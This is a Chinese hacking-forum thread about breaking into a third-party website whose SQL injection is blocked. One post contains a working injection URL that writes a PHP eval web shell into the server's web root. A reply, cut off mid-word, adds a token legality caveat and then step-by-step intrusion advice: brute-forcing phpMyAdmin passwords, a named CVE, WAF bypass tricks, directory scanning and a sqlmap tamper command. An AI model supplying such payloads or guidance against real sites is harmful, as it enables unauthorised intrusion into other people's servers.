sql不能注入的网站如何破解
sql不能注入的网站如何破解??
目前只知道 myphpadmin 登录地址其他一无所知?
啊D工具 不支持sql注入?
需要用到那些工具? 什么操作
大神回复支持下呗 谢谢了:):):) 干嘛非要找注入呢?
去技术文章板块多看看 90_ 发表于 2015-12-29 13:21
干嘛非要找注入呢?
去技术文章板块多看看
没有找注入哦,只是不知道如何攻破,同服务器下就一个 网址 也不能旁注 https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,%2527%3C?php%20eval%28$_POST[%22c%22]%29;?%3E%2527%20into%20outfile%20%2527E:\web\1.php%2527%23
这样的漏洞如何利用呢 john_chu 发表于 2015-12-29 15:55
https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7 ...
写入文件需要相关权限
Re: sql不能注入的网站如何破解
你好!理解你想学习渗透测试技巧的热情,不过还是先提醒一下,未经授权的攻击行为是违法的,建议只在自有靶场或合法授权的环境中练习。 针对你的问题:如果网站对SQL注入有防御(比如参数化查询、WAF等),那么单纯靠啊D这类自动化工具确实很难成功。此时可以尝试以下思路: 1. **寻找其他入口**:除了SQL注入,还可以试试XSS、文件上传、CSRF、逻辑漏洞等。既然你知道phpMyAdmin的地址,可以尝试弱口令爆破(比如admin/root/空密码等),或者看看是否存在phpMyAdmin的已知漏洞(比如CVE-2018-12613等)。 2. **手工测试绕过**:如果是WAF过滤,可以尝试大小写混合、注释符、编码绕过(URL编码、Unicode)、HTTP参数污染等方法。手工测试比工具更灵活。 3. **信息收集**:用nmap、dirsearch等扫一下目录、备份文件、敏感文件(如config.php.bak)。有时开发者会留下测试接口或者调试页面。 4. **升级工具**:尝试用sqlmap配合tamper脚本(如space2comment、between等)来自动化绕过。命令类似:`sqlmap -u "URL" --tamper=space2comment --random-agent`。 5. **看源码(如有)**:如果网站是开源的(比如Discuz!、WordPres
页:
[1]